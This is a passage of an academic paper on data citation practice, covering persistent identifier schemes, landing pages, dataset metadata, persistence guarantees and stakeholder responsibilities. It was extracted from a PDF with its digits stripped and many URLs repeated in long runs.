crossref doi registration with contractb link checking crossref contacts owners per policyc; metadata should persist identifiers.org uri registration link checking metadata should persist https uri domain owner responsibility none domain owner responsibility purl uri registration none domain owner responsibility handle (hdl) registration none identifier should persist ark user-defined policies hosting server host-dependent; metadata should persistd nbn ietf rfc domain resolver metadata should persist notes. a the datacite persistence contract language reads: “objects assigned dois are stored and managed such that persistent access to them can be provided as appropriate and maintain all urls associated with the doi.” b the crossref persistence contract language reads in part: “member must maintain each digital identifier assigned to it or for which it is otherwise responsible such that said digital identifier continuously resolves to a response page. . . containing no less than complete bibliographic information about the corresponding original work (including without limitation the digital identifier), visible on the initial page, with reasonably sufficient information detailing how the original work can be acquired and/or a hyperlink leading to the original works itself. . . ” c crossref identifier policy reads: “the . . . member shall use the digital identifier as the permanent url link to the response page. the. . . member shall register the url for the response page with crossref, shall keep it up-to-date and active, and shall promptly correct any errors or variances noted by crossref.” d for example, the french national library has rigorous internal checks for the million arks that it manages via its own resolver. both require persistence commitments of their registrants and take active steps to monitor compliance. datacite is specifically designed—as its name would indicate—to support data citation. a recent collaboration between the software archive github, the zenodo repository system at cern, figshare, and mozilla science lab, now makes it possible to cite software, giving dois to github-committed code (github guides, ). handle system (hdls) handles are identifiers in a general-purpose global name service designed for securely resolving names over the internet, compatible with but not requiring the domain name service. handles are location independent and persistent. the system was developed by bob kahn at the corporation for national research initiatives, and currently supports, on average, million resolution requests per month—the largest single user being the digital object identifier (doi) system. handles can be expressed as uris (cnri, ; dyson, ). identifiers.org uniform resource identifiers (uris) many common identifiers used in the life sciences, such as pubmed or protein data bank ids, are not natively web-resolvable. identifiers.org associates such database-dependent identifiers with persistent uris and resolvable physical urls. identifiers.org was developed and is maintained at the european bioinformatics institute, and was built on top of the miriam registry (juty, le novére & laibe, ). identifiers.org uris are constructed using the syntax http://identifiers.org/ <data resource name>/<native identifier>, where <data resource name> designates a particular database, and <native identifier> is the id used within that database to retrieve the record. the identifiers.org resolver supports multiple starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. alternative locations (which may or may not be mirrors) for data it identifies. it supports programmatic access to data. purls purls are “persistent uniform resource locators”, a system originally developed by the online computer library center (oclc). they act as intermediaries between potentially changing locations of digital resources, to which the purl name resolves. purls are registered and resolved at http://purl.org, http://purl.access.gpo.gov, http:// purl.bioontology.org and various other resolvers. purls are implemented as an http redirection service and depend on the survival of their host domain name (oclc, ; library of congress, ). purls fail to resolve upon object removal. handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object. http uris uris (uniform resource identifiers) are strings of characters used to identify resources. they are the identifier system for the web. uris begin with a scheme name, such as http or ftp or mailto, followed by a colon, and then a scheme-specific part. http uris will be quite familiar as they are typed every day into browser address bars, and begin with http:. their scheme-specific part is next, beginning with “//”, followed by an identifier, which often but not always is resolvable to a specific resource on the web. uris by themselves have no mechanism for storing metadata about any objects to which they are supposed to resolve, nor do they have any particular associated persistence policy. however, other identifier schemes with such properties, such as dois, are often represented as uris for convenience (berners-lee, fielding & masinter, ; jacobs & walsh, ). like purls, native http uris fail to resolve upon object removal. handling this behavior through a metadata landing page (see below) is the responsibility of the owner of the cited object. archival resource key (arks) archival resource keys are unique identifiers designed to support long-term persistence of information objects. an ark is essentially a url (uniform resource locator) with some additional rules. for example, hostnames are excluded when comparing arks in order to prevent current hosting arrangements from affecting identity. the maintenance agency is the california digital library, which offers a hosted service for arks and dois (kunze & starr, ; kunze, ; kunze & rodgers, ; janée, kunze & starr, ). arks provide access to three things—an information object; related metadata; and the provider’s persistence commitment. arks propose inflections (changing the end of an identifier) as a way to retrieve machine-readable metadata without requiring (or prohibiting) content negotiation for linked data applications. unlike, for example, dois, there are no fees to assign arks, which can be hosted on an organization’s own web server if desired. they are globally resolvable via the identifier-scheme-agnostic n t (name-to-thing, http://n t.net) resolver. the ark registry is replicated at the california starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.org http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.access.gpo.gov http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://purl.bioontology.org http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://n t.net http://dx.doi.org/ . /peerj-cs. digital library, the bibliothéque nationale de france, and the us national library of medicine (kunze & starr, ; peyrard, kunze & tramoni, ; kunze, ). national bibliography number (nbns) national bibliography numbers are a set of related publication identifier systems with country-specific formats and resolvers, utilized by national library systems in some countries. they are used by, for example, germany, sweden, finland and italy, for publications in national archives without publisher-assigned identifiers such as isbns. there is a urn namespace for nbns that includes the country code; expressed as a urn, nbns become globally unique (hakala, ; moats, ). landing pages the identifier included in a citation should point to a landing page or set of pages rather than to the data itself (hourclé et al., ; rans et al., ; clark, evans & strollo, ). and the landing page should persist even if the data is no longer accessible. by “landing page(s)” we mean a set of information about the data via both structured metadata and unstructured text and other information. there are three main reasons to resolve identifiers to landing pages rather than directly to data. first, as proposed in the jddcp, the metadata and the data may have different lifespans, the metadata potentially surviving the data. this is true because data storage imposes costs on the hosting organization. just as printed volumes in a library may be de-accessioned from time to time, based on considerations of their value and timeliness, so will datasets. the jddcp proposes that metadata, essentially cataloging information on the data, should still remain a citable part of the scholarly record even when the dataset may no longer be available. second, the cited data may not be legally available to all, even when initially accessioned, for reasons of licensing or confidentiality (e.g. protected health information). the landing page provides a method to host metadata even if the data is no longer present. and it also provides a convenient place where access credentials can be validated. third, resolution to a landing page allows for an access point that is independent from any multiple encodings of the data that may be available. landing pages should contain the following information. items marked “conditional” are recommended if the conditions described are present, e.g., access controls are required to be implemented if required by licensing or phi considerations; multiple versions are required to be described if they are available; etc. • (recommended) dataset descriptions: the landing page must provide descriptions of the datasets available, and information on how to programmatically retrieve data where a user or device is so authorized. (see dataset description for formats.) • (conditional) versions: what versions of the data are available, if there is more than one version that may be accessed. • (optional) explanatory or contextual information: provide explanations, contextual guidance, caveats, and/or documentation for data use, as appropriate. starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. • (conditional) access controls: access controls based on content licensing, protected health information (phi) status, institutional review board (irb) authorization, embargo, or other restrictions, should be implemented here if they are required. • (recommended) persistence statement: reference to a statement describing the data and metadata persistence policies of the repository should be provided at the landing page. data persistence policies will vary by repository but should be clearly described. (see persistence guarantee for recommended language). • (recommended) licensing information: information regarding licensing should be provided, with links to the relevant licensing or waiver documents as required (e.g., creative commons cc waiver description (https://creativecommons.org/ publicdomain/zero/ . /), or other relevant material.) • (conditional) data availability and disposition: the landing page should provide information on the availability of the data if it is restricted, or has been de-accessioned (i.e., removed from the archive). as stated in the jddcp, metadata should persist beyond de-accessioning. • (optional) tools/software: what tools and software may be associated or useful with the datasets, and how to obtain them (certain datasets are not readily usable without specific software). content encoding on landing pages landing pages should provide both human-readable and machine-readable content. • html; that is, the native browser-interpretable format used to generate a graphical and/or language-based display in a browser window, for human reading and under- standing. • at least one non-proprietary machine-readable format; that is, a content format with a fully specified syntax capable of being parsed by software without ambiguity, at a data element level. options: xml, json/json-ld, rdf (turtle, rdf-xml, n-triples, n-quads), microformats, microdata, rdfa. best practices for dataset description minimally the following metadata elements should be present in dataset descriptions: • dataset identifier: a machine-actionable identifier resolvable on the web to the dataset. • title: the title of the dataset. • description: a description of the dataset, with more information than the title. • creator: the person(s) and/or organizations who generated the dataset and are responsible for its integrity. • publisher/contact: the organization and/or contact who published the dataset and is responsible for its persistence. • publicationdate/year/releasedate: iso standard dates are preferred (klyne & newman, ). • version: the dataset version identifier (if applicable). starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / http://dx.doi.org/ . /peerj-cs. additional recommended metadata elements in dataset descriptions are: • creator identifier(s): orcid or other unique identifier of the individual creator(s). orcid ids are numbers identifying individual researchers issued by a consortium of prominent academic publishers and others (editors, ; maunsell, ). • license: the license or waiver under which access to the content is provided (preferably a link to standard license/waiver text (e.g. https://creativecommons.org/publicdomain/ zero/ . /). when multiple datasets are available on one landing page, licensing information may be grouped for all relevant datasets. a world wide web consortium (http://www.w .org) standard for machine-accessible dataset description on the web is the w c data catalog vocabulary (dcat, mali, erickson & archer, ). it was developed at the digital enterprise research institute and later standardized by the w c egovernment working group, with broad participation, and underlies some other data interoperability models such as (dcat application profile working group, ) and (gray et al., ). the w c health care and life sciences dataset description specification (gray et al., ), currently in editor’s draft status, provides capability to add additional useful metadata beyond the dcat vocabulary. this is an evolving standard that we suggest for provisional use. data in the described datasets might also be described using other formats depending on the application area. other possible approaches for dataset description include datacite metadata (datacite metadata working group, ), dublin core (dublin core metadata initiative, ), the data documentation initiative (ddi) (data documentation initiative, ) for social sciences, or iso (iso/tc , ) for geographic information. where any of these formats are used they should support at least the minimal set of recommended metadata elements described above. serving the landing pages the uris used as identifiers for citation should resolve to html landing pages with the appropriate metadata in a human readable form. to enable automated agents to extract the metadata these landing pages should include an html <link> element specifying a machine readable form of the page as an alternative. for those that are capable of doing so, we recommend also using web linking (nottingham, ) to provide this information from all of the alternative formats. should content management systems be developed specifically for maintaining and serving landing pages, we recommend both of these solutions plus the use of content negotiation (holtzman & mutz, ). a more detailed discussion of these techniques and our justification for using multiple solutions is included in the appendix. note that in all of these cases, the alternates are other forms of the landing page. access to the data itself should be indicated through the dcat fields accessurl or downloadurl as appropriate for the data. data that is spread across multiple files can be indicated by linking to an ore resource map (lagoze & van de sompel, ). starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / https://creativecommons.org/publicdomain/zero/ . / http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://www.w .org http://dx.doi.org/ . /peerj-cs. persistence guarantees the topic of persistence guarantees is important from the standpoint of what repository owners and managers should provide to support jddcp-compliant citable persistent data. it is closely related to the question of persistent identifiers, that is, the identifiers must always resolve somewhere, and as noted above, this should be to a landing page. but in the widest sense, persistence is a matter of service guarantees. organizations providing trusted repositories for citable data need to detail their persistence policies transparently to users. we recommend that all organizations endorsing the jddcp adopt a persistence guarantee for data and metadata based on the following template: “[organization/institution name] is committed to maintaining persistent identifiers in [repository name] so that they will continue to resolve to a landing page providing meta- data describing the data, including elements of stewardship, provenance, and availability. [organization/institution name] has made the following plan for organizational persis- tence and succession: [plan].” as noted in the landing pages section, when data is de-accessioned, the landing page should remain online, continuing to provide persistent metadata and other information including a notation on data de-accessioning. authors and scholarly article publishers will decide on which repositories meet their persistence and stewardship requirements based on the guarantees provided and their overall experience in using various repositories. guarantees need to be supported by operational practice. implementation: stakeholder responsibilities research communications are made possible by an ecosystem of stakeholders who prepare, edit, publish, archive, fund, and consume them. each stakeholder group endorsing the jddcp has, we believe, certain responsibilities regarding implementation of these recommendations. they will not all be implemented at once, or homogeneously. but careful adherence to these guidelines and responsibilities will provide a basis for achieving the goals of uniform scholarly data citation. . archives and repositories: (a) identifiers, (b) resolution behavior, (c) landing page metadata elements, (d) dataset description and (e) data access methods, should all conform to the technical recommendations in this article. . registries: registries of data repositories such as databib (http://databib.org) and r data (http://www.re data.org) should document repository conformance to these recommendations as part of their registration process, and should make this information readily available to researchers and the public. this also applies to lists of “recommended” repositories maintained by publishers, such as those maintained by nature scientific data (http://www.nature.com/sdata/data-policies/repositories) and f research (http://f research.com/for-authors/data-guidelines). . researchers: researchers should treat their original data as first-class research objects. they should ensure it is deposited in an archive that adheres to the practices described starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://databib.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.re data.org http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://f research.com/for-authors/data-guidelines http://dx.doi.org/ . /peerj-cs. here. we also encourage authors to publish preferentially with journals which implement these practices. . funding agencies: agencies and philanthropies funding research should require that recipients of funding follow the guidelines applicable to them. . scholarly societies: scholarly societies should strongly encourage adoption of these practices by their members and by publications that they oversee. . academic institutions: academic institutions should strongly encourage adoption of these practices by researchers appointed to them and should ensure that any institutional repositories they support also apply the practices relevant to them. conclusion these guidelines, together with the niso jats . d xml schema for article publishing (national center for biotechnology information, ), provide a working technical basis for implementing the joint data citation principles. they were developed by a cross-disciplinary group hosted by the force .org digital scholarship com- munity. data citation implementation group (dcig, https://www.force .org/ force .org (http://force .org) is a community of scholars, librarians, archivists, publishers and research funders that has arisen organically to help facilitate the change toward improved knowledge creation and sharing. it is incorporated as a us (c) not-for-profit organization in california. datacitationimplementation), during , as a follow-on project to the successfully concluded joint data citation principles effort. registries of data repositories such as r data (http://r data.org) and publishers’ lists of “recommended” repositories for cited data, such as those maintained by nature publications (http://www.nature.com/sdata/data-policies/repositories), should take ongoing note of repository compliance to these guidelines, and provide compliance checklists. we are aware that some journals are already citing data in persistent public repositories, and yet not all of these repositories currently meet the guidelines we present here. compliance will be an incremental improvement task. other deliverables from the dcig are planned for release in early , including a review of selected data-citation workflows from early-adopter publishers (nature, biomed central, wiley and faculty of ). the niso-jats version . d revision is now considered a stable release by the jats standing committee, and is under final review by the national information standards organization (niso) for approval as the updated ansi/niso z . - standard. we believe it is safe for publishers to use the . d revision for data citation now. a forthcoming article in this series will describe the jats revisions in detail. we hope that publishing this document and others in the series will accelerate the adoption of data citation on a wide scale in the scholarly literature, to support open validation and reuse of results. integrity of scholarly data is not a private matter, but is fundamental to the validity of published research. if data are not robustly preserved and accessible, the foundations of published research claims based upon them are not verifiable. as these practices and guidelines are increasingly adopted, it will no longer be acceptable to credibly assert any starr et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org http://force .org https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation https://www.force .org/datacitationimplementation http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://r data.org http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://www.nature.com/sdata/data-policies/repositories http://dx.doi.org/ . /peerj-cs. claims whatsoever that are not based upon robustly archived, identified, searchable and accessible data. we welcome comments and questions which should be addressed to the forcnet@googlegroups.com open discussion forum. acknowledgements we are particularly grateful to peerj academic editor harry hochheiser (university of pittsburgh), reviewer tim vines (university of british columbia), and two anonymous reviewers, for their careful, very helpful, and exceptionally timely comments on the first version of this article. many thanks as well to virginia clark (université paul sabatier), john kunze (california digital library) and maryann martone (university of california at san diego) for their thoughtful suggestions on content and presentation. appendix serving landing pages: implementation details ideally, all versions of the landing page would be resolvable from a single uri through content negotiation (holtzman & mutz, ), serving an html representation for humans and the appropriate form for automated agents. in its simplest form, content negotiation uses the http accept and/or accept-language headers to vary the content returned based on media type (a.k.a. mime type) and language. ark-style inflections propose an alternate way to retrieve machine-readable metadata without requiring content negotiation. some web servers have provision to serve alternate documents by using file names that only vary by extension; when the document is requested without an extension, the web server returns the file highest rated by the request’s accept header. enabling this feature typically requires the intervention of the web server administrator and thus may not be available to all publishers. the content negotiation standard also allows servers to assign arbitrary tags to documents and for user agents to request documents that match a given tag using the accept-features header. this could allow for selection between documents that use the same media type but use different metadata standards. although we believe that content negotiation is the best long-term solution to make it easier to provide for automated agents, this may require building systems to manage landing page content or adapting existing content management systems (cms). for a near-term solution, we recommend web linking (nottingham, ). web linking requires assigning a separate resolvable uri for each variant representation of the landing page. as each alternative has a uri, the documents can be cached reliably without requiring additional requests to the server hosting the landing pages. web linking also allows additional relationships to be defined, so that it can also be used to direct automated agents to landing pages for related data as well as alternatives. web linking also allows for a title to be assigned to each link, should they be presented to a human: starr et 